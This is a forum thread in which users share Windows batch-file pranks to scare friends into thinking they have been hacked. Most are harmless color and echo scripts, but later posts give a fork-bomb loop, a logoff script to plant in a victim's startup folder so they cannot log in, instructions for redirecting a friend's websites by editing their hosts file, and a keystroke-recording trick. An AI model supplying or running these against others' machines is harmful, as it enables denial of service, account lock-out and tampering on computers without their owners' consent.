Funny .bat files

Status
Not open for further replies.

belfong

I was wondering if you know how to make any funny .bat files (or other), that makes the screen go crazy and your friends think their computer has been haXed :D But still not harmful.

Heres one really really simple (but makes some of your friends think there's something wrong with their computer):

"
color FF0000
echo asdasdadasdasdasdadasdasdasdadasd
color 0000FF
color FF0000

C:/1.bat

"

Just an example, but you know what i mean :p

(Btw, that simple program can make some of your friends go crazy :D)

salman

That looks interesting, but i'm a bit of a noob to that sort of thing, could you post some instructions on how to do it, maybe some screenshots. Thanks. (btw i just wanna have some harmless fun with some friends)

belfong

Yeah, sure.

Step 1. Open notepad (start menu, run, notepad).

Step 2. Write in this in notepad:

color (any color you want) ex. color ff0000

Step 3.

a new line and write down, echo (after the space after ECHO, you can write anything you choose) ex. echo HAXED HAXED HAXED (you can make the text as long as you want)

Step 4.
After this it's just to repeat this process for as long as you want ( but it's enough just to do 5 lines, as i will show you in the final example).

Step 5.
After your done with the lines, make a new line and write down the destination files name of where you're gonna save it aswell as the name of the file (name of the file= 1.bat) so it looks like this, ex. C:/1.bat
So if you want to save it in the folder Program in the C: Drive then write this: C:/Program/1.bat

Step 6.
Save As, save it in the folder that you've written in the text (in this case C:/) and save it as 1.bat, and make sure that you've put the Save as type to All files, not just text documents (*.txt)

Step 7.
You're done. Now run the file, and if you want to make it fullscreen then right click on the program window and click properties and set the Display Option to: Full screen.

Here's how it should look like when your done:

echo HaXed HaXed HaXed HaXed HaXed HaXed
color 000000
echo HaXed HaXed HaXed HaXed HaXed
color FFFFFF
echo HaXed HaXed HaXed HaXed HaXed
C:/1.bat

There you go ;)

Last edited:

charly

good old dos

@echo off
echo blanking screen .......
cls
echo searching ini's
@dir c:\*.ini /s/w
echo .... Scared ?
pause

nffc10

I've done this a few times, it always get's my mates. Although i haven't done it in a while....:D

charly

it would be an idea also to use

copy con > c:\typings.txt
type c:\typings.txt

cuz as long there's no ctrl c it records your hits ;-)

nffc10

good old dos

@echo off
echo blanking screen .......
cls
echo searching ini's
@dir c:\*.ini /s/w
echo .... Scared ?
pause

That's what i was missing.:rolleyes: the pause at the end to get it to stay open, it's been a while.:p

Deepblue

very good one joke to play

ping www.barney.com or barbie.com and note the ip address

on your friends system goto the
C:\WINDOWS\system32\drivers\etc folder
edit the HOST file with notepad
add below the 127.0.0.1 localhost line

217.64.234.232 google.com

or the ip you looked up and your friends most used sight
save file.
now when ever they go to that sight it will take them to the ip of barnie or barbie or what ever ip you put in the file.

Last edited:

TrollaByte

Are you allowed to post things that could make a computer lag like crazy? if yes, here is a file that can do that.
"
@echo off
:a
start
goto a
"
Now save that as (insert name here).bat
And there is also one that could make it so they could not log in to their account, however, it only works on XP and such.
"
@echo off
start C:\WINDOWS\system32\logoff.exe
"
Save that as anything.bat, then put it in their startup folder.

Last edited:
Status
Not open for further replies.